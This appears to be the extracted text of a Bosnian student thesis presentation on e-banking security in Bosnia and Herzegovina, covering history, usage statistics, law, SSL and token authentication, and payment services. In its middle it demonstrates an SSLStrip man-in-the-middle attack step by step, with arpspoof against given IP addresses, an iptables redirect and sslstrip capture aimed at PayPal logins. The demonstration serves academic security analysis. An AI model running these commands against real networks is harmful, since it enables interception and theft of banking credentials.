E-banking i sigurnost

tehničkih rješenja za Internet

transakcije

Univerzitet u Sarajevu Elektrotehnički fakultet

Mentor: dr. Narcis Behlilović Kandidat: Aldina Bajraktarević

KRATKI HISTORIJAT IDEJE e-BANKINGa

PROBLEMI KORISNIKA USLUGA e-BANKING

AKTUENI TRENDOVI

PREGLED STANJA e-BANKARSTVA U BIH

PRAVNA LEGISLATIVA RELEVANTNA ZA OBLAST BANKARSTVA I ELEKTRONSKOG BANKARSTVA

MEHANIZMI POSTIZANJA SIGURNOSTI ZA PRODAVCA I KUPCA U TRANSAKCIJI

SSL PROTOKOL

ANALIZA POTENCIJALNIH RJEŠENJA: OTP I USB TOKENI

MEHANIZMI ZA NARUŠAVANJE SIGURNOSTI

PRIMJERI USPJEŠNIH NAPADA

RIZICI KORIŠTENJA BANKOVNIH KARTICA ZA PLAĆANJE

PAYPAL

MONEYBOOKERS

PIKPAY

MJERE PREVENCIJE ZA ZAŠTITU SIGURNOSTI UČESNIKA U TRANSAKCIJI

E-banking ili elektronsko bankarstvo je opći pojam za procese kojima korisnik može obavljati bankarske transakcije elektronskim putem bez posjećivanja institucije nadležne za transakciju (banke, bankomati, ...).

KUPAC PRODAVAC

BANKA BANKA

Naručuje robu i

usluge

Šalje fakturu

Obavještava

prodavca da je

uplata izvršena

Daje nalog banci

da prebaci novac

prodavcu

Informiše

kupca da je

njegov račun

zadužen

Prebacuje sredstva na račun

prodavca

Informiše o izvršenoj uplati

Financijska i vremenska dobit

kvalitet

• Pronalazak novca (između 4. i 8. stoljeća p.n.e)

• Prvi elektronski transfer novca izvršen je još davne 1860. godine. -Western Union iz

SAD-a uz pomoć telegrafa

Prve ideje za rješavanje problema porasta obima papirnih tokova platnog prometa kroz proces kompjuterizacije i eliminisanje papira, ponudila su dva američka profesora, Jakobs Henri (Jacobs Henry) i Robert H. Gregory (Robert H. Gregory).

Osnovni nedostaci e-Bankinga su:

• odsustvu sigurnosti pri obavljanju poslovanja;

• nepostojanju zakonske regulative;

• nedostatak privatnosti, otuđenosti i odbojnosti prema inovacijama i opasnosti od zloupotrebe

internet bankarstva.

Usluge koje klijenti mogu dobiti on-line su:

• pribavljanje informacija o tekućem računu,

stanje na računu, dozvoljeni limit;

• printanje izvještaja o prometu na računu;

• transfer sa računa na račun;

• plaćanje računa;

• kupovina i prodaja akcija;

• naručivanje isplata;

• praćenje transfera novca;

• pregled aktuelnih kamata;

• kontakt sa bankom,...

Korištenje interneta u BiH u stalnom je porastu. Prema procjenama nadležnih agencija, više od 2.000.000 ljudi u ovoj zemlji koristi globalnu kompjutersku mrežu, što je oko 52 posto od ukupnog broja stanovnika.

70.474

96.041

Prema podacima CB BiH, upotreba e-bankinga za građane BiH:

2011 2012

23.865

29.599

Pravna lica

2011 2012

2006. godine BiH postaje članica Konvencije o cyber kriminalu Vijeća Evrope. Ovo je do sada najveći, najopsežniji ali i najkvalitetniji evropski dokument o takvoj vrsti kriminala koji su potpisale i neke neevropske zemlje.

Zakon o elektronskom potpisu 2006.

Ne postoji PKI infrastruktura za pravna i fizička lica na nivou države

Implementacija???

MUP RS-a formirao posebnu jedinicu za borbu protiv cyber kriminala, što je prvo odjeljenje te vrste u cijeloj BiH

U nadležnim institucijama trebalo bi razviti organizacije i educirati ljude kako bismo bili spremni da se borimo protiv ovog oblika kriminala. Do tada će postojeći zakoni za ovu oblast ostati samo na papiru.

• Smart Cards; • Tokeni; • Tanovi.

S I

G

U

R

N

O

S

T

SSL je autentifikacijski protokol, neovisan od aplikacije, i pruža sljedeće usluge: • Klijent-poslužitelj provjeru autentičnosti; • Tajnost podataka; • Provjera podataka izvora; • Integritet podataka.

Jednokratne lozinke su oblik „jake autentifikacije“, koja pruža veću razinu zaštite i koriste se za bankovne transakcije preko Interneta, mrežnim sistemima u firmama i drugim sistemima koji sadrže osjetljive i povjerljive informacije.

Naprednije vrste tokena zahtijevaju neki oblik veze sa računarom (npr. USB ili Bluetooth) kako bi stupili u kontakt sa poslužiteljem.

HTTPS: Hyper Text Transfer Protocol Secure - HTTPS je kombinacija Hyper Text Transfer

Protocol i Secure Socket Layer (SSL protokol) / Transport Layer Security (TLS) koji služi za

osiguranje šifrirane komunikaciju između web poslužitelja i klijenta. Obično se koristi HTTPS za

internet bankarstvo, platne transakcije stranicu za prijavu, itd. ovaj protokol na portu 443 za

komunikacije. Web stranice koje koriste ovaj HTTPS-u su i GMail.com, ali i druge web stranice

kao što su PayPal, Amazon, itd.

Ukoliko želimo da vidimo vezu računara i web poslužitelja u CommandPrompt ukucamo: netstat –an :

1.Linux OS

2. Arpspoof

3. IPTables

4. SSLStrip

5. NetStat

1. echo '1' > /proc/sys/net/ipv4/ip_forward

// Ovom naredbom omogućavamo port forwarding, dopušta se BackTrack-u da može

proslijediti svaki paket, pa i onaj koji nije namjenjen klijentovom računaru.

2. Saznati adresu mrežnog gatewaya

netstat –nr

3. Koristiti naredbu arpspoof, kako biste izvršili tkz. Man in the middle attack.

arpspoof -i eth0 77.78.248.141

4. SSLStrip kreiran od strane Moxie Morlinspike koji omogućava demonstraciju

HTTPS raskrivanje napada koji su izneseni na Black Hat DC 2009.

To će transparentno oteti HTTP promet na mreži, gledati https veze i preusmjeravanja,

a zatim mapirati veze u dvojne HTTP veze ili homografski slične HTTPS veze.

4.1 Download-ovati SSLStrip

4.2 tar zxvf sslstrip-0.9.tar.gz

4.3 cd sslstrip-0.9

4.4 python setup.py install

5. Izvršenje SSL Strip napada

5.1 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port

8080

// Potrebno je podesiti firewall

pravilo preko naredbe iptables,

na način da se omogući

preusmjerenje upita sa porta

80 na 8080.

5.1.1 python sslstrip.py –w secret

echo '1' > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 77.78.248.141 77.78.248.1

Unutar foldera SSLStrip kreiran je novi fajl koji pohranjuje sve informacije koje su već

snimljene preko HTTP protokola, pa čak i HTTPS. Iz priloženog je izvršeno oslobađanje

HTTPS-a od „s“-dodatka, pa tako sada se može izvršiti pristup stranici PayPal-a na

sljedeći način:

Phishing Pharming Blackhole kit

Carding- ako ne pokrijete karticu prilikom placanja,čitanje 16-cifrenog broja sa kartice sasvim dovoljan

Lažiranje poruka e-pošte i web stranica->cilj saznati povjerljive i korisne informacije

Preusmjeravanje korisnika na lažni web site

JavaScript kod

PAYPAL

MONEYBOOKERS

PIKPAY

Posrednik u kupovini između kupca i prodavca

E-servis koji omogućava platne usluge i transfer novca putem Interneta

Internet servis koji pruža On-line plaćanje, on-line naplata, podizanje novca u lokalnim bankama

city deal ekupon

Najveći nivo sigurnosti, fizička sigurnost servera, ANTI-FRAUD timovi, verifikacija Verisign...

MOSTAR BEOGRAD

BANJA LUKA SARAJEVO

corporateretail

CA

Kako bi administrator određenoj pametnoj kartici dodao certifikat, potrebno je da ručno pristupi CA, i da naravno preko mašine kojoj pristupa CA, bude priključen čitač kartica. Nakon što administartor ubaci karticu, koristi tkz. ActivCard Gold. To je programski paket, koji upotrebom kartice i čitača kartice ili USB ActivKey-a osigurava najviši nivo sigurnosti autentifikacije korisnika.

Analizirajući sistem koristi dužinu ključa od 1024 i hash algoritam SHA-1. Kada administrator doda digitalni certifikat, onda se automatski podaci prenose preko serijskog broja u aplikaciju.

VeriSign je poznata kompanija kojoj banka plaća usluge korištenja cetifikata. Da bi banka koristila usluge VeriSigna na tri godine, to košta cca 2.500,00 EURa.

serviseri

servisi

posrednici

uređaji za plaćanje

korisnikov računar

korisnikova svijest

Rezultati on-line ankete urađene na bazi 55 ispitanika

• U skorije vrijeme će sve veći broj firmi i građana uvidjeti da je mnogo jednostavnije obavljati internet transakcije

iz svog doma, po mnogo nižoj cijeni i na jednostavan način. S druge strane, kombinacija backtrack, sslstrip i MiTM

je samo jedno od potencijalno jakih sredstava za narušavanje sigurnosti bankovnih računa na vrlo „jednostavan“ način.

Ono što se ostavlja kao otvoreno pitanje

bankama i ostalim pružaocima usluga

internet bankarstva, jeste pitanje spoja

usluge, cijene, sigurnosti i same reklame u

jednu jedinstvenu cijelinu, koja bi izazvala

povjerenje kod korisnika usluga, a ujedno

donijela određene profite.

KUPAC

PRODAVAC

BANKA